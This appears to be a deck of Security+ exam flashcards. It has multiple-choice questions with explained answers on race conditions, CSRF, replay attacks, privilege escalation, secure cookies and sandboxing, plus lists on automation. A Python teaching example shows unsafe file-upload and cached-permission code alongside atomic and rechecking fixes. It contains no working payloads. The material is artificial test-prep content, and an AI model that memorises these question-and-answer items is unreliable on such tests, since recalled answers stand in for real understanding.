A developer identifies a vulnerability in a file-processing module used by an internal application. When two users attempt to upload files with the same filename at nearly the same time, the application writes both uploads to the same location. This causes unpredictable results, including one user being able to access or overwrite the other user’s file.

Which of the following BEST describes this type of vulnerability?

A. Race condition
B. Resource exhaustion
C. Broken access control
D. Improper error handling

A

✅ Correct Answer: A. Race condition
This is a classic race condition, where two actions occur almost simultaneously, and the application’s logic doesn’t properly handle concurrent access to the same file or resource. The order of execution affects the result and causes security and data integrity issues.

❌ Incorrect Answers:
B. Resource exhaustion – That refers to overusing system resources like memory or CPU, not simultaneous access.
C. Broken access control – That would involve unauthorized access due to missing or misconfigured access checks, not timing conflicts.
D. Improper error handling – Refers to exposing sensitive info or failing securely on error — not concurrent access logic.

💡 Security+ Tip:
If the question mentions two users or processes accessing the same resource at once, and the outcome depends on timing, it’s a race condition — even if TOCTOU isn’t specifically mentioned.
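Both race-condition questions above (rights cached at login and used later; two uploads to one filename) come down to the same fix: decide at the moment of use, with an atomic operation. This added Python example, not from the book, reproduces both flaws and their repairs; the filenames, user names, and grant table are constructed for the example.

```python
import os
import tempfile
import threading

# ---- Two uploads racing for the same filename --------------------------------

def save_unsafe(upload_dir: str, filename: str, data: bytes) -> str:
    # BAD: "wb" creates-or-truncates, so whichever upload finishes last silently
    # replaces the other user's file.
    path = os.path.join(upload_dir, os.path.basename(filename))
    with open(path, "wb") as fh:
        fh.write(data)
    return path

def save_exclusive(upload_dir: str, filename: str, data: bytes) -> str:
    # GOOD: O_CREAT|O_EXCL is one atomic create-if-absent operation; the loser
    # of the race gets FileExistsError and can be given a distinct name instead.
    path = os.path.join(upload_dir, os.path.basename(filename))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path

def race(saver, upload_dir: str, uploaders: int = 2) -> int:
    # Start the uploads on separate threads and count how many "succeeded".
    outcomes, lock = [], threading.Lock()
    def upload(i: int) -> None:
        try:
            saver(upload_dir, "report.pdf", b"contents from user %d" % i)
            ok = True
        except FileExistsError:
            ok = False
        with lock:
            outcomes.append(ok)
    threads = [threading.Thread(target=upload, args=(i,)) for i in range(uploaders)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(outcomes)

# ---- Rights checked at login but used later (TOCTOU) --------------------------

class Permissions:
    def __init__(self):
        self._grants = {"alice": {"report.pdf"}}       # constructed grant table
    def allows(self, user: str, resource: str) -> bool:
        return resource in self._grants.get(user, set())
    def revoke(self, user: str, resource: str) -> None:
        self._grants.get(user, set()).discard(resource)
    def snapshot(self, user: str) -> set:
        return set(self._grants.get(user, set()))

def login(perms: Permissions, user: str) -> dict:
    # BAD pattern: the session caches the rights as they were at login time.
    return {"user": user, "rights": perms.snapshot(user)}

def read_with_cached_rights(session: dict, resource: str) -> bool:
    return resource in session["rights"]               # stale after a revoke

def read_with_recheck(perms: Permissions, session: dict, resource: str) -> bool:
    return perms.allows(session["user"], resource)     # decided at time of use

def demo() -> tuple:
    with tempfile.TemporaryDirectory() as d:
        unsafe_wins = race(save_unsafe, d)
    with tempfile.TemporaryDirectory() as d:
        exclusive_wins = race(save_exclusive, d)
    perms = Permissions()
    session = login(perms, "alice")
    perms.revoke("alice", "report.pdf")
    return (unsafe_wins, exclusive_wins,
            read_with_cached_rights(session, "report.pdf"),
            read_with_recheck(perms, session, "report.pdf"))
```

demo() reports that both unsafe uploads "succeed" (one silently overwrote the other) while exactly one exclusive create wins, and that the cached session still grants a file whose access was revoked while the rechecking version refuses it. In a real upload handler the loser of the exclusive create would be retried with a per-user directory or a random suffix rather than surfaced as an error.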

31
Q

What are the 9 Use Cases of Automation and Scripting

A

1- User Provisioning
Automate adding, modifying, or removing user accounts and permissions.
2 - Resource Provisioning
Automate allocation or deallocation of system resources (e.g., storage, compute).
3 - Guard Rails
Use automation to enforce policies and prevent security violations.
4 - Security Groups
Automate managing group memberships to control access permissions.
5 - Ticket Creation
Automatically generate and route alerts or incidents to the appropriate team.
6 - Escalation
Automate alerting higher-level personnel during serious incidents.
7 - Enabling/Disabling Services and Access
Automate turning services or access on/off based on triggers or conditions.
8 - Continuous Integration and Testing
Automate software build and test processes for faster, more secure deployments.
9 - Integrations and APIs
Automate data sharing between tools and platforms through APIs.

32
Q

7 Benefits of Automation and Scripting

A

1 - Efficiency and Time Savings
Reduces manual tasks so teams can focus on higher-level work.
2 - Enforcing Baselines
Ensures consistent application of security policies and configurations.
3 - Standardized Infrastructure Configurations
Automates system setup to reduce errors and misconfigurations.
4 - Scaling in a Secure Manner
Supports rapid infrastructure growth while maintaining security.
5 - Employee Retention
Eliminates repetitive tasks, improving job satisfaction and reducing burnout.
6 - Reduced Reaction Time
Responds faster to incidents through automated alerts and actions.
7 - Workforce Multiplier
Amplifies team capacity by automating repetitive tasks.

32
Q

5 Other Considerations of Automation and Scripting

A

1 - Complexity
Automation scripts can be hard to build and manage; they require advanced technical skill.
2 - Cost
Initial setup may be expensive due to tools, training, and skilled personnel.
3 - Single Point of Failure
A failed or misconfigured script can disrupt large parts of operations if overly relied on.
4 - Technical Debt
Outdated or neglected scripts can cause inefficiencies and security risks over time.
5 - Ongoing Supportability
Scripts must be regularly maintained to stay effective and compatible with changing systems.

33
Q

A user visits a malicious site while logged into their banking portal in another tab. The site forces the browser to issue an unauthorized funds transfer using the active session token. What type of attack occurred?

A. Cross-site request forgery (CSRF)
B. Stored XSS
C. On-path attack
D. Directory traversal

A

✅ A. Cross-site request forgery (CSRF) – Tricks a logged-in user’s browser into submitting a malicious request.

❌ B. Stored XSS – Attacker script is saved on the server.
❌ C. On-path attack – Intercepts traffic, not browser requests.
❌ D. Directory traversal – File system attack, unrelated to sessions.

💡 Security+ Tip:
CSRF exploits a user’s active, authenticated session without their knowledge. Look for authenticated actions sent without the user’s consent.

34
Q

An attacker captures network traffic between a user and a server, then replays the authentication request to gain unauthorized access. What type of attack has occurred?

A. Session hijacking
B. Reflected XSS
C. Replay attack
D. Command injection

A

✅ C. Replay attack – Reuses captured authentication data to gain access, especially when no session tokens or timestamps are validated.

❌ A. Session hijacking – Involves stealing a session token, not replaying captured data.
❌ B. Reflected XSS – Targets browser execution, not network traffic.
❌ D. Command injection – Attempts to run system-level commands, not replay requests.

💡 Security+ Tip:
If the attacker records and resends legitimate traffic, it’s a replay attack — prevented with timestamps, tokens, and encryption.

35
Q

A vulnerability allows a low-privileged user to exploit flawed application logic to gain administrative access. What type of attack has occurred?

A. Session hijacking
B. Privilege escalation
C. SQL injection
D. Directory traversal

A

✅ B. Privilege escalation – The attacker gains higher access than they should have, usually due to poor access controls or application logic flaws.

❌ A. Session hijacking – Doesn’t involve escalating privileges.
❌ C. SQL injection – Could be a method, but not the result.
❌ D. Directory traversal – Gains access to files, not administrative privileges.

💡 Security+ Tip:
If a user moves from limited access to admin or root, it’s privilege escalation. Look for phrases like “low-privileged” or “unauthorized access gained.”

36
Q

A developer wants to prevent attackers from accessing or tampering with cookies used in a web application. Which of the following techniques should they implement?

A. Stored XSS
B. Buffer overflow
C. Dynamic code analysis
D. Secure cookies

A

✅ D. Secure cookies – Set the Secure flag so the cookie is only sent over HTTPS, and the HttpOnly flag so client-side scripts cannot read it; together they protect cookies from being exposed or transmitted over insecure channels.

❌ A. Stored XSS – An attack, not a protection.
❌ B. Buffer overflow – Memory attack, unrelated to cookies.
❌ C. Dynamic code analysis – Security testing method, not cookie protection.

💡 Security+ Tip:
If the question mentions protecting cookies, the answer is likely secure cookies — especially if referencing HTTPS or JavaScript restrictions.

37
Q

A security analyst is analyzing a suspicious file in an isolated, controlled environment to observe its behavior without risking production systems. What technique is being used?

A. Static analysis
B. Secure coding
C. Sandboxing
D. Input validation

A

✅ C. Sandboxing – Isolates a process or file in a safe environment to observe behavior without affecting real systems.

❌ A. Static analysis – Reviews code without running it.
❌ B. Secure coding – A development practice, not an analysis method.
❌ D. Input validation – Prevents malicious input, unrelated to malware testing.

💡 Security+ Tip:
If a file is executed in an isolated or controlled environment, it’s sandboxing — commonly used for malware analysis or file inspection.